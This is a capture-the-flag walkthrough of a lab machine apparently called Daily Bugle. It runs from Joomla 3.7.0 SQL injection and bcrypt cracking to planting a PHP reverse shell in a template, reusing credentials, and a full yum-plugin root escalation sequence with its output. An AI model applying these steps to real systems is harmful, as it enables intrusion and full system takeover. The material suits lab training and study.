Daily Bugle Walkthrough - Offensive Pentesting

Reconnaissance

As always, the first step consists of the reconnaissance phase as port scanning.

Ports Scanning

During this step, we’re gonna identify the target to see what we have behind the IP Address.

nmap -sC -sV -oA nmap -Pn 10.10.88.15

22/tcp   open  ssh     syn-ack ttl 63 OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 68:ed:7b:19:7f:ed:14:e6:18:98:6d:c5:88:30:aa:e9 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCbp89KqmXj7Xx84uhisjiT7pGPYepXVTr4MnPu1P4fnlWzevm6BjeQgDBnoRVhddsjHhI1k+xdnahjcv6kykfT3mSeljfy+jRc+2ejMB95oK2AGycavgOfF4FLPYtd5J97WqRmu2ZC2sQUvbGMUsrNaKLAVdWRIqO5OO07WIGtr3c2ZsM417TTcTsSh1Cjhx3F+gbgi0BbBAN3sQqySa91AFruPA+m0R9JnDX5rzXmhWwzAM1Y8R72c4XKXRXdQT9szyyEiEwaXyT0p6XiaaDyxT2WMXTZEBSUKOHUQiUhX7JjBaeVvuX4ITG+W8zpZ6uXUrUySytuzMXlPyfMBy8B
|   256 5c:d6:82:da:b2:19:e3:37:99:fb:96:82:08:70:ee:9d (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBKb+wNoVp40Na4/Ycep7p++QQiOmDvP550H86ivDdM/7XF9mqOfdhWK0rrvkwq9EDZqibDZr3vL8MtwuMVV5Src=
|   256 d2:a9:75:cf:2f:1e:f5:44:4f:0b:13:c2:0f:d7:37:cc (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIP4TcvlwCGpiawPyNCkuXTK5CCpat+Bv8LycyNdiTJHX
80/tcp   open  http    syn-ack ttl 63 Apache httpd 2.4.6 ((CentOS) PHP/5.6.40)
|_http-favicon: Unknown favicon MD5: 1194D7D32448E1F90741A97B42AF91FA
|_http-generator: Joomla! - Open Source Content Management
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 15 disallowed entries 
| /joomla/administrator/ /administrator/ /bin/ /cache/ 
| /cli/ /components/ /includes/ /installation/ /language/ 
|_/layouts/ /libraries/ /logs/ /modules/ /plugins/ /tmp/
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.6.40
|_http-title: Home
3306/tcp open  mysql   syn-ack ttl 63 MariaDB (unauthorized)

Enumerating Port 80

We can start by looking at the webserver. When we go to URL we see Joomla engine installed.

Enumerating Joomla Using Joomscan

perl joomscan.pl -u http://10.10.97.153

We know the version is “Joomla 3.7.0” by running joomscan. We can also find the version by reading README.txt.

Searchsploit

This Joomla 3.7 version is vulnerable to SQL injection.

Exploit-DB

Joomla! 3.7.0 - ‘com_fields’ SQL Injection

Let’s exploit it using SQLMap

While doing Google search I stumble upon a script Joomblah.

python joomblah.py http://10.10.97.153

Running the script returned us a hashed credential and username jonah,

Let’s find out which encryption is it using hashid tool.

hashid hash.txt

image


Cracking bcrypt Hash

Hashcat

Let’s crack our encrypted hash using hashcat -m 3200

hashcat -m 3200 -a0 --force hash.txt /usr/share/wordlists/rockyou.txt

It took a while cracking the hash or else you can use John.

John

john --format=bcrypt --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

Ones you’re done cracking the HASH and found your credential let’s login at HTTP:/IP/administrator using jonah and password which you found.


Exploitation

Now we have to get a reverse shell to get low-privilege access to the machine.

Go to Templates > New File

Insert php-reverse-shell.php inside shell.php which we just created in Joomla.

Now, if you access the URL via http://IP/templates/protostar/shell.php you’ll get a reverse shell.

image

We got 'Permission Denied' while accessing jjameson home directory.

Let’s find credentials for this user.

After doing some digging I came across a configuration.php file inside /var/www/html

Configuration.php usually contains database variables that usually contain like username, password, and database name.

The credential which we found inside configuration.php luckily we can reuse it to 'ssh jjameson'


Privilege Escalation

Once we’re in the machine let’s escalate our privilege to root.

The first thing to commonly check is sudo -l to see if root has some kind of special permission.

(ALL) NOPASSWD: /usr/bin/yum

After a quick search, I found a link to GTFObins to become root by running some commands using yum.

[[email protected] ~]$ TF=$(mktemp -d)
[[email protected] ~]$ cat >$TF/x<<EOF
> [main]
> plugins=1
> pluginpath=$TF
> pluginconfpath=$TF
> EOF
[[email protected] ~]$ cat >$TF/y.conf<<EOF
> [main]
> enabled=1
> EOF
[[email protected] ~]$ cat >$TF/y.py<<EOF
> import os
> import yum
> from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE
> requires_api_version='2.1'
> def init_hook(conduit):
>   os.execl('/bin/sh','/bin/sh')
> EOF
[[email protected] ~]$ sudo yum -c $TF/x --enableplugin=y
Loaded plugins: y
No plugin match for: y
sh-4.2# 
sh-4.2# id
uid=0(root) gid=0(root) groups=0(root)
sh-4.2# wc -c /root/root.txt 
33 /root/root.txt
1 Like